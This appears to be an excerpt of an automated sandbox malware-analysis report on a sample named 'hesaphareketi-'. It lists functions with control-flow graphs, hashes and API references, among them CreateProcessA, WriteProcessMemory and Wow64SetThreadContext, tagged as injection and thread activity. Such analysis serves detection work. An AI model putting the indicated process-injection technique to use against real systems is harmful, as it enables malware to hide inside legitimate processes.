                                            • Instruction Fuzzy Hash: 2FE0A5B4929318CBD750CF58E456AE8B7B8BB0B301F0424D6D50DA6251DB309984CE05
                                            Function 05778BB8 Relevance: 148.5, Strings: 118, Instructions: 975COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 5778bb8-5778bb9 1 5778bbb-5778bc1 0->1 2 5778c39-5778c3f 0->2 3 5778bc3-5778c04 1->3 4 5778c41-5778c47 1->4 2->4 11 5778c0e-5778c4a 3->11 7 5778c03-5778c04 4->7 8 5778c49-5778c4a 4->8 7->11 10 5778c54-5779f07 8->10 362 5779f12-5779f18 10->362 11->10 363 5779f21-5779f26 362->363
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-3571017164
                                            • Opcode ID: ed66b23097197a14e43bdfbd113aad2ca7a5b77769898d4ada3135d104d0e096
                                            • Instruction ID: d33b233e3887ccea36997d8e122ee522cf49cdc6a1a8f5445d915b10096a06e4
                                            • Opcode Fuzzy Hash: ed66b23097197a14e43bdfbd113aad2ca7a5b77769898d4ada3135d104d0e096
                                            • Instruction Fuzzy Hash: E9A2B974B0122A8FCB69EFA4E851BDD7771BF84300F5096D890096F269DE306E4ADF91
                                            Function 05778BC8 Relevance: 148.5, Strings: 118, Instructions: 959COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 364 5778bc8-5779f18 719 5779f21-5779f26 364->719
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-3571017164
                                            • Opcode ID: ede60c09bd9f9711f10d3b963a40e61e72995377de3a0c172d6b35ed3a1fced2
                                            • Instruction ID: 0524847403e55c57844cc65456767de8402778e319f94279d3907a79195872d6
                                            • Opcode Fuzzy Hash: ede60c09bd9f9711f10d3b963a40e61e72995377de3a0c172d6b35ed3a1fced2
                                            • Instruction Fuzzy Hash: 96A2B974B0122A8FCB69EFA4E851BDD7771BF84300F5096D890096F269DE306E4ADF91
                                            Function 05772810 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2610 5772810-5772872 call 5771be0 2618 5772874-5772876 2610->2618 2619 57728d8-5772904 2610->2619 2620 577290b-5772913 2618->2620 2621 5772878-5772888 2618->2621 2619->2620 2626 577291a-5772982 2620->2626 2625 577288e-57728c9 call 57726c4 2621->2625 2621->2626 2637 57728ce-57728d7 2625->2637 2643 5772984-5772986 2626->2643 2644 5772989-577298c 2626->2644 2645 577298d-5772a55 2643->2645 2646 5772988 2643->2646 2644->2645 2648 5772a5b-5772a69 2645->2648 2646->2644 2649 5772a72-5772ab8 2648->2649 2650 5772a6b-5772a71 2648->2650 2655 5772ac5 2649->2655 2656 5772aba-5772abd 2649->2656 2650->2649 2657 5772ac6 2655->2657 2656->2655 2657->2657
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq$Hq
                                            • API String ID: 0-925789375
                                            • Opcode ID: 1ee97355440e70cadb49c15768f04b342533e8732faf3e4c5ea3c4567cca57df
                                            • Instruction ID: 307e0e76f748f829a8a3036ed7e5d96466dd34b322714d0308a19641a0eb84df
                                            • Opcode Fuzzy Hash: 1ee97355440e70cadb49c15768f04b342533e8732faf3e4c5ea3c4567cca57df
                                            • Instruction Fuzzy Hash: 4C814C74E003188FDF14DFA9D8546AEBBF2BF88300F54852AE419AB355DB349942DBA1
                                            Function 0577B2B8 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2658 577b2b8-577b2da 2659 577b2e3-577b2ed 2658->2659 2660 577b2dc-577b2e2 2658->2660 2662 577b2f3-577b30c call 5775c44 * 2 2659->2662 2663 577b529-577b554 call 577a3e0 2659->2663 2671 577b312-577b334 2662->2671 2672 577b55b-577b5ad call 577a3e0 2662->2672 2663->2672 2679 577b336-577b344 call 5775c54 2671->2679 2680 577b345-577b354 2671->2680 2686 577b356-577b373 2680->2686 2687 577b379-577b39a 2680->2687 2686->2687 2694 577b39c-577b3ad 2687->2694 2695 577b3ea-577b412 2687->2695 2698 577b3af-577b3c7 call 5775c64 2694->2698 2699 577b3dc-577b3e0 2694->2699 2718 577b415 call 577b7e3 2695->2718 2719 577b415 call 577b808 2695->2719 2706 577b3cc-577b3da 2698->2706 2707 577b3c9-577b3ca 2698->2707 2699->2695 2702 577b418-577b43d 2709 577b483 2702->2709 2710 577b43f-577b454 2702->2710 2706->2698 2706->2699 2707->2706 2709->2663 2710->2709 2713 577b456-577b479 2710->2713 2713->2709 2717 577b47b 2713->2717 2717->2709 2718->2702 2719->2702
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq$Hq
                                            • API String ID: 0-925789375
                                            • Opcode ID: 3556ebea01ba32ce8c4966531b53e2569d7e19dfac8031eda474d7471b9f7ca6
                                            • Instruction ID: a9b493ebbcaacb6a4eb28a04839b7e69a98bd7440fc574574fc8218fde7492b0
                                            • Opcode Fuzzy Hash: 3556ebea01ba32ce8c4966531b53e2569d7e19dfac8031eda474d7471b9f7ca6
                                            • Instruction Fuzzy Hash: 12713B34B002188FCF18EBB4D598AEE77F2FF89310B2544A9E406AB361DA35DC41DB61
                                            Function 05775A70 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2766 5775a70-577838b 2770 5778392-57783ca 2766->2770 2771 577838c-5778391 2766->2771 2776 57783d1 2770->2776 2777 57783cc-57783d0 2770->2777 2778 57783d3-57783f1 2776->2778 2779 5778451-577847f 2776->2779 2777->2776 2782 57783f3-57783fc 2778->2782 2783 57783fe 2778->2783 2788 5778486-5778512 2779->2788 2784 5778400-5778405 2782->2784 2783->2784 2786 5778407-5778409 2784->2786 2787 577844a 2784->2787 2786->2788 2789 577840b-577840e 2786->2789 2787->2779 2807 5778564-5778566 2788->2807 2808 5778514-577851a 2788->2808 2789->2788 2791 5778410-5778413 2789->2791 2791->2788 2792 5778415-5778418 2791->2792 2792->2788 2794 577841a-577841e 2792->2794 2796 5778425-577843a 2794->2796 2797 5778420-5778423 2794->2797 2798 5778445-5778449 2796->2798 2799 577843c-5778440 call 5775abc 2796->2799 2797->2796 2797->2798 2799->2798 2809 577852f-5778535 2808->2809 2810 577851c-5778524 2808->2810 2811 5778537-577854a 2809->2811 2812 577854b-5778551 2809->2812 2816 577852a call 5778578 2810->2816 2817 577852a call 5778568 2810->2817 2812->2807 2814 5778553-577855b 2812->2814 2813 577852c-577852e 2814->2807 2816->2813 2817->2813
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (q$Hq
                                            • API String ID: 0-1154169777
                                            • Opcode ID: 90b129186c8be54d21b3e0f92bd74e24dc65cc3f8b416ca6b08d88db4e671b91
                                            • Instruction ID: 5d085fd14336d2bda8942275ece4e474d30c6e5d034f274c6d437d9fc64739f5
                                            • Opcode Fuzzy Hash: 90b129186c8be54d21b3e0f92bd74e24dc65cc3f8b416ca6b08d88db4e671b91
                                            • Instruction Fuzzy Hash: 0551E231B042149FDB58EF68E058BAD77A6FBC4700F1984AAD50ADB361CA34EC47D792
                                            Function 0757BBFA Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2818 757bbfa-757bc95 2821 757bc97-757bca1 2818->2821 2822 757bcce-757bcee 2818->2822 2821->2822 2823 757bca3-757bca5 2821->2823 2829 757bd27-757bd56 2822->2829 2830 757bcf0-757bcfa 2822->2830 2824 757bca7-757bcb1 2823->2824 2825 757bcc8-757bccb 2823->2825 2827 757bcb5-757bcc4 2824->2827 2828 757bcb3 2824->2828 2825->2822 2827->2827 2831 757bcc6 2827->2831 2828->2827 2836 757bd8f-757be49 CreateProcessA 2829->2836 2837 757bd58-757bd62 2829->2837 2830->2829 2832 757bcfc-757bcfe 2830->2832 2831->2825 2834 757bd21-757bd24 2832->2834 2835 757bd00-757bd0a 2832->2835 2834->2829 2838 757bd0e-757bd1d 2835->2838 2839 757bd0c 2835->2839 2850 757be52-757bed8 2836->2850 2851 757be4b-757be51 2836->2851 2837->2836 2841 757bd64-757bd66 2837->2841 2838->2838 2840 757bd1f 2838->2840 2839->2838 2840->2834 2842 757bd89-757bd8c 2841->2842 2843 757bd68-757bd72 2841->2843 2842->2836 2845 757bd76-757bd85 2843->2845 2846 757bd74 2843->2846 2845->2845 2848 757bd87 2845->2848 2846->2845 2848->2842 2861 757beda-757bede 2850->2861 2862 757bee8-757beec 2850->2862 2851->2850 2861->2862 2863 757bee0 2861->2863 2864 757beee-757bef2 2862->2864 2865 757befc-757bf00 2862->2865 2863->2862 2864->2865 2866 757bef4 2864->2866 2867 757bf02-757bf06 2865->2867 2868 757bf10-757bf14 2865->2868 2866->2865 2867->2868 2871 757bf08 2867->2871 2869 757bf26-757bf2d 2868->2869 2870 757bf16-757bf1c 2868->2870 2872 757bf44 2869->2872 2873 757bf2f-757bf3e 2869->2873 2870->2869 2871->2868 2875 757bf45 2872->2875 2873->2872 2875->2875
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0757BE36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 34a84830e85e5ab1d7a49425b515658ef3fbc0ff9a8b0c78b36e249aac97b6a9
                                            • Instruction ID: 4083f6f371da68aeed16eb7bfaf3b98822a6cda7fef3adce4aeb860fd449e81d
                                            • Opcode Fuzzy Hash: 34a84830e85e5ab1d7a49425b515658ef3fbc0ff9a8b0c78b36e249aac97b6a9
                                            • Instruction Fuzzy Hash: F7915EB1D0071ACFEB24CF69D841BEDBBB2BF48310F14856AE804A7240DB759985CF91
                                            Function 0757BC00 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2876 757bc00-757bc95 2878 757bc97-757bca1 2876->2878 2879 757bcce-757bcee 2876->2879 2878->2879 2880 757bca3-757bca5 2878->2880 2886 757bd27-757bd56 2879->2886 2887 757bcf0-757bcfa 2879->2887 2881 757bca7-757bcb1 2880->2881 2882 757bcc8-757bccb 2880->2882 2884 757bcb5-757bcc4 2881->2884 2885 757bcb3 2881->2885 2882->2879 2884->2884 2888 757bcc6 2884->2888 2885->2884 2893 757bd8f-757be49 CreateProcessA 2886->2893 2894 757bd58-757bd62 2886->2894 2887->2886 2889 757bcfc-757bcfe 2887->2889 2888->2882 2891 757bd21-757bd24 2889->2891 2892 757bd00-757bd0a 2889->2892 2891->2886 2895 757bd0e-757bd1d 2892->2895 2896 757bd0c 2892->2896 2907 757be52-757bed8 2893->2907 2908 757be4b-757be51 2893->2908 2894->2893 2898 757bd64-757bd66 2894->2898 2895->2895 2897 757bd1f 2895->2897 2896->2895 2897->2891 2899 757bd89-757bd8c 2898->2899 2900 757bd68-757bd72 2898->2900 2899->2893 2902 757bd76-757bd85 2900->2902 2903 757bd74 2900->2903 2902->2902 2905 757bd87 2902->2905 2903->2902 2905->2899 2918 757beda-757bede 2907->2918 2919 757bee8-757beec 2907->2919 2908->2907 2918->2919 2920 757bee0 2918->2920 2921 757beee-757bef2 2919->2921 2922 757befc-757bf00 2919->2922 2920->2919 2921->2922 2923 757bef4 2921->2923 2924 757bf02-757bf06 2922->2924 2925 757bf10-757bf14 2922->2925 2923->2922 2924->2925 2928 757bf08 2924->2928 2926 757bf26-757bf2d 2925->2926 2927 757bf16-757bf1c 2925->2927 2929 757bf44 2926->2929 2930 757bf2f-757bf3e 2926->2930 2927->2926 2928->2925 2932 757bf45 2929->2932 2930->2929 2932->2932
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0757BE36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 746f79541c3106dfab438521c845ffecd1052daa7baa3979a7737d404b48ddc6
                                            • Instruction ID: d076336f540fe3a73a51c1fe13a38606e320cda6c2e09c8124127831a416aa77
                                            • Opcode Fuzzy Hash: 746f79541c3106dfab438521c845ffecd1052daa7baa3979a7737d404b48ddc6
                                            • Instruction Fuzzy Hash: 33914DB1D0071ACFEB24DF69D841BEDBBB2BF48310F14856AE808A7240DB759985CF91
                                            Function 00DFD71A Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00DFD97E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: c123be22833a68645631e4a5a851a5749edd21e5690cd095290ceecfa679baa3
                                            • Instruction ID: 5109c69f1b32f0c86d935791098c9da776bb892332c0c91a699e9ea27a9b9aff
                                            • Opcode Fuzzy Hash: c123be22833a68645631e4a5a851a5749edd21e5690cd095290ceecfa679baa3
                                            • Instruction Fuzzy Hash: D2816870A00B498FD724DF29D04576ABBF2FF88304F05892DD58ACBA50D775E84ACBA1
                                            Function 057335F0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057342E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: d25d014035a27059f415aa4ca64db8f57835b9961b4e6cfe9e4dc03749a06c3e
                                            • Instruction ID: 8d69253ac160e3fbc995cf76fb86fc92b50b83068926bcdbcb8b4d923f3269c6
                                            • Opcode Fuzzy Hash: d25d014035a27059f415aa4ca64db8f57835b9961b4e6cfe9e4dc03749a06c3e
                                            • Instruction Fuzzy Hash: 5F51BFB1D003099FDF14CF9AD885ADEBBB6BF48310F64812AE819AB211D775A845CF90
                                            Function 057341C9 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057342E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 7cbf5a8f41ce8ce98f1c38b95cb0daa0804b057ec2aa43f9bd6f366190886f7a
                                            • Instruction ID: 3d57b7ddc69e500f998413c11e22c7986eed07c35b3118d701b574e0fa452ab9
                                            • Opcode Fuzzy Hash: 7cbf5a8f41ce8ce98f1c38b95cb0daa0804b057ec2aa43f9bd6f366190886f7a
                                            • Instruction Fuzzy Hash: B551C0B1D00309DFDF14CF9AC885ADEBBB6BF48310F64812AE819AB210D775A841CF90
                                            Function 00DF5A64 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2deb724ffa062fd37ef077c174e15e1cb9841d5535540ec4211fde5c191a2ab5
                                            • Instruction ID: c5416562e789c9b17b478cf3a8a9cdf9faa050964ab7077572be5d90b18aa0a7
                                            • Opcode Fuzzy Hash: 2deb724ffa062fd37ef077c174e15e1cb9841d5535540ec4211fde5c191a2ab5
                                            • Instruction Fuzzy Hash: A641F071C05B5DCFDB24CBA4E4453EDBBB0EB46324F15828AC2466B259C771A906CF61
                                            Function 00DF58EC Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 6d5dfb4a84a82c9872b01d2200d895e6277cb6b4c0bf65ecbf92b633cb05a504
                                            • Instruction ID: 3c4d1abe24c23043d012dddd81d6a6ec78e6de1480b4653c7d2ee0e2a5aea8f5
                                            • Opcode Fuzzy Hash: 6d5dfb4a84a82c9872b01d2200d895e6277cb6b4c0bf65ecbf92b633cb05a504
                                            • Instruction Fuzzy Hash: AC4101B1C0071DCBEB24CFA9D8847DEBBB1BF48314F20816AD508AB255DB756946CF90
                                            Function 00DF44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: edfcf87d6b275ee90950f692b104ed19a69e3d5c1ea2d9cb6555e8586a551b17
                                            • Instruction ID: f10e7aa2fcfdcc6bf294e877fa6cee722e18e897e63b8f10c7b4311c2dafe162
                                            • Opcode Fuzzy Hash: edfcf87d6b275ee90950f692b104ed19a69e3d5c1ea2d9cb6555e8586a551b17
                                            • Instruction Fuzzy Hash: 3141F271C00B1DCBEB24DFA9C844B9EBBF1BF48304F20816AD509AB255DB756946CFA0
                                            Function 057367BE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05736851
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 195ebfa02ec7d26ac39872621a21d29d77f33764f4255b4d60000fbb51415ee1
                                            • Instruction ID: 76817b3b492c009f620641968cc59298ec6aef4670329b4bb1fee4e07bd0b573
                                            • Opcode Fuzzy Hash: 195ebfa02ec7d26ac39872621a21d29d77f33764f4255b4d60000fbb51415ee1
                                            • Instruction Fuzzy Hash: A43117B4A003059FDB14CF89C449AAABBF2FF88324F25C459D519AB322D374A841CF60
                                            Function 0757B972 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0757BA08
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: cc88344536fee506d258c35429311ce431167eb447976bd32dbe2dfdbfecf0bb
                                            • Instruction ID: a5e68c0f1f7e7a71bbfc60d71d1e99dbe0525fdb304170f8939be99d5747fd3d
                                            • Opcode Fuzzy Hash: cc88344536fee506d258c35429311ce431167eb447976bd32dbe2dfdbfecf0bb
                                            • Instruction Fuzzy Hash: A62159B1D003199FDB10DFAAD881BEEBBF1FF48310F50842AE918A7240D7799941CBA0
                                            Function 0757BA60 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0757BAE8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: a57fd82969d2f37f23ae65efb247afaf16ae5a65ae4d2230ee2751f8bf74bf33
                                            • Instruction ID: ddeaaed903425307ce7d17f5a914f8c4afc2c2d8130dd34ba7bc267491d3465a
                                            • Opcode Fuzzy Hash: a57fd82969d2f37f23ae65efb247afaf16ae5a65ae4d2230ee2751f8bf74bf33
                                            • Instruction Fuzzy Hash: EB2127B1D003199FDB10DFAAD841BEEBBF5FF48320F50842AE518A7640CB399941CBA5
                                            Function 0757B978 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0757BA08
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: a78e25253b89be549173130af883c4c1f3c4210d08543c8376df132c3ec0d132
                                            • Instruction ID: c8ecf45f3c6ada45f1a88667ebe20ff74f04b10cf4c51d2792f667c1d4c02bf0
                                            • Opcode Fuzzy Hash: a78e25253b89be549173130af883c4c1f3c4210d08543c8376df132c3ec0d132
                                            • Instruction Fuzzy Hash: 522127B1D003599FDB10DFAAD881BDEBBF5FF48310F50842AE919A7240D7799941CBA4
                                            Function 0757B3A0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757B426
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: dd726e5d9f09fde824ba89e7253153ee164b159528da5477dad20c378974f8db
                                            • Instruction ID: d3f5d5c1e319db29dd6b826fd83303757d5fb104e0047bfdddf14246a3d6c8fc
                                            • Opcode Fuzzy Hash: dd726e5d9f09fde824ba89e7253153ee164b159528da5477dad20c378974f8db
                                            • Instruction Fuzzy Hash: 492159B1D003098FDB10DFAAD4857EEBBF5FF48220F54842AD459A7241CB789945CFA5
                                            Function 00DFF758 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00DFFBAE,?,?,?,?,?), ref: 00DFFC6F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: bcb384fbbd5e304e1c483e7854468fa58975ec460e4122602bda27427a77e060
                                            • Instruction ID: 0f4c112b07ea67e9dfd035e8330cb0b10f4622ad5b9688b7250edb75d460ef10
                                            • Opcode Fuzzy Hash: bcb384fbbd5e304e1c483e7854468fa58975ec460e4122602bda27427a77e060
                                            • Instruction Fuzzy Hash: 792103B5D0020C9FDB10CF9AD884AEEBBF4EB48320F14842AE914A3310D378A940CFA1
                                            Function 0757B3A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757B426
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: de68d2757b06a0f9c8cea2ab0c42a62a8e3905f65904b88b71854c6378b16b87
                                            • Instruction ID: f7f6273a2cdb958c7a6cae0dd5427e723883b0b454908c172487919c0da27d65
                                            • Opcode Fuzzy Hash: de68d2757b06a0f9c8cea2ab0c42a62a8e3905f65904b88b71854c6378b16b87
